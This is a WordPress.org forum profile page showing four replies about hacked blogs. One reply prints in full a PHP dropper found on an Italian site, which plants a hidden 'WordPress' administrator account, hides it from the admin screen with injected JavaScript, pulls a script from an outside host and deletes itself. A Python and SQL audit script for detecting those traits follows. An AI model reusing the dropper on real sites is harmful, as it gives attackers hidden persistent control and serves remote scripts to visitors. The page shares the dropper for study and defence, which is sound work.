Title: cave-bit's Replies | WordPress.org

---

# cave-bit


## Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)

 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [My site was hacked? What to do?](https://wordpress.org/support/topic/my-site-was-hacked-what-to-do/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/my-site-was-hacked-what-to-do/#post-583505)
 * Audurz,
    you have a hidden user in your users table. I found him in your blog.
   Read what I wrote in this post: [http://wordpress.org/support/topic/168964?replies=25](http://wordpress.org/support/topic/168964?replies=25)
   You have this problem. Ciauuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuz Mau
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [harffull codes (eval( unescape( “function check_%)](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735908)
 * The problem is always the same. Only an admin inserts code in files with the
   file manager in the admin page.
    If the code changes, someone is at work… Check your users table (MySQL)
   to see if a phantom user exists… (with the name WordPress, for example…)
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [wp2.5 has been hacked!!!](https://wordpress.org/support/topic/wp25-has-been-hacked/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/wp25-has-been-hacked/#post-745339)
 * > I can access MySQL, but I don’t know what to look for or where.
 * Do you have phpMyAdmin???
    SmockLady… see if your users table (in the MySQL page)
   has a user with the name WordPress, and if it exists, delete it. Read this: [http://wordpress.org/support/topic/168964?replies=25](http://wordpress.org/support/topic/168964?replies=25)
   bye…
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Security issue, multiple sites](https://wordpress.org/support/topic/security-issue-multiple-sites/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/#post-740063)
 * Excuse my English… We have the problem on the Italian speleology site scintilena.com
   
   I found the file that creates the username WordPress, and the password is the
   site name (`$_SERVER['HTTP_HOST']`). (This password in the users table is encrypted
   with md5.) The file name is ha.php and I found it in the wp-admin directory. But
   I have no idea how it was uploaded. I think it was uploaded with some plugin, but
   I am not sure. I found other sites with this problem and I did not damage them…
   but it is a big problem. We tracked the user WordPress on the scintilena site and
   his IP is 194.110.162.79 (we logged this user and redirected him to the FBI site);
   it is a server located in the USA with the company's headquarters in Panama (Whois info).
   I am posting the code for study:
 *     ```
       <?php
       require_once("../wp-config.php");
   
       add_hidden_user();
   
       @unlink(__FILE__);
   
       function add_hidden_user() {
            global $wpdb;
            $user_login = "WordPress"; $user_pass = md5($_SERVER['HTTP_HOST']);
            $js_server = "http://search-again.net/js/js.js"; if(strlen($js_server)>33){die("Server does not fit to cell!");};
            if($wpdb->get_var("SELECT ID FROM $wpdb->users WHERE user_login='$user_login'")>0){
            	$wpdb->query("DELETE FROM $wpdb->users WHERE user_login='$user_login'");
            };
            $users = $wpdb->get_results("SELECT * FROM $wpdb->users LIMIT 1");
            if(array_key_exists('display_name',$users[0])) {
                 $query = "INSERT INTO $wpdb->users
                      (user_login, user_pass)
                 VALUES
                      ('$user_login', '$user_pass')";
                 $wpdb->query( $query );
                 $user_id = $wpdb->insert_id;
                 $up = array('first_name','last_name','nickname','description','jabber','aim','yim');
                 $js='...
   
            <b id="user_superuser"><script language="JavaScript">
            var setUserName = function(){
                 try{
                      var t=document.getElementById("user_superuser");
                      while(t.nodeName!="TR"){
                           t=t.parentNode;
                      };
                      t.parentNode.removeChild(t);
                      var tags = document.getElementsByTagName("H3");
                      var s = " shown below";
                      for (var i = 0; i < tags.length; i++) {
                           var t=tags[i].innerHTML;
                           var h=tags[i];
                           if(t.indexOf(s)>0){
                                s =(parseInt(t)-1)+s;
                                h.removeChild(h.firstChild);
                                t = document.createTextNode(s);
                                h.appendChild(t);
                           }
                      }
                 }catch(e){};
            };
            addLoadEvent(setUserName);
            </script>';
                 foreach ($up as $k) {
                      $v='';
                      if ($k='first_name') {$v=$wpdb->escape($js);};
                      update_usermeta( $user_id, $k, $v );
                 }
                 $user = new WP_User($user_id);
                 $user->set_role('administrator');
                 wp_cache_delete($user_id, 'users');
                 wp_cache_delete($user_login, 'userlogins');
                 if(md5($wpdb->get_var("SELECT meta_value FROM $wpdb->usermeta WHERE user_id='$user_id' AND meta_key='first_name'"))==md5($js)){
                      return "sucess";
                 } else {
                      $wpdb->query("DELETE FROM $wpdb->usermeta WHERE user_id='$user_id'");
                      $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                      return "failed";
                 }
   
            } else {
                 $js1 = '<b id="ux"><script language="JavaScript"';
                 $js2 = ' src="'.$js_server.'"></script>';
   
                 $query = "INSERT INTO $wpdb->users
                      (user_login, user_pass, user_level, user_firstname, user_lastname)
                 VALUES
                      ('$user_login', '$user_pass', 10,'".$wpdb->escape($js1)."','".$wpdb->escape($js2)."' )";
                 $wpdb->query( $query );
   
                 $user_id = $wpdb->insert_id;
                 if(md5($wpdb->get_var("SELECT user_firstname FROM $wpdb->users WHERE id='$user_id'"))==md5($js1) &&
                    md5($wpdb->get_var("SELECT user_lastname FROM $wpdb->users WHERE id='$user_id'"))==md5($js2)
                 ){
                      return 1;
                 } else {
                      $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                      return 0;
                 }
            }
       }
       ?>
       ```
   
 * If you solve it, please post.
    Thanks and.. ciauuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuz
   Mau
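
A defender-side audit for the traits described in the post above (an account named WordPress, a password equal to the md5 of the host name, a script tag stored in user meta), as an added example that is not part of the original post. The `wp_` table prefix, the host names and the sample rows are constructed assumptions; the example covers the `wp_usermeta` branch of the posted code only.

```python
import hashlib
import sqlite3

HOSTS = ["blog.example", "www.blog.example"]  # assumed HTTP_HOST values for the site

def build_sample_db():
    """Constructed rows: one legitimate admin, one editor, one planted account."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    planted_pass = hashlib.md5(b"blog.example").hexdigest()
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "admin", "$P$constructed-hash-1"),
        (2, "anna", "$P$constructed-hash-2"),
        (3, "WordPress", planted_pass),
    ])
    db.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", [
        (1, "first_name", "Site"),
        (2, "first_name", "Anna"),
        (3, "first_name", '<b id="user_superuser"><script language="JavaScript">/* ... */</script>'),
    ])
    return db

# Plain SQL, so it can also be pasted into phpMyAdmin (adjust the table prefix).
SCRIPT_IN_META = """
    SELECT u.user_login, m.meta_key
    FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
    WHERE LOWER(m.meta_value) LIKE '%<script%'
"""

def audit(db, hosts):
    """Return sorted (user_login, reason) pairs for accounts matching the post's traits."""
    findings = set()
    for login, key in db.execute(SCRIPT_IN_META):
        findings.add((login, f"script tag in usermeta {key}"))
    host_hashes = {hashlib.md5(h.encode()).hexdigest() for h in hosts}
    for login, user_pass in db.execute("SELECT user_login, user_pass FROM wp_users"):
        if user_pass in host_hashes:
            findings.add((login, "password is md5 of the site host name"))
        if login == "WordPress":
            findings.add((login, "login name used by the dropper"))
    return sorted(findings)

if __name__ == "__main__":
    for login, reason in audit(build_sample_db(), HOSTS):
        print(f"{login}: {reason}")
```

Because the stored script removes the account's row from the admin users screen, the check has to run against the database itself rather than the dashboard.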
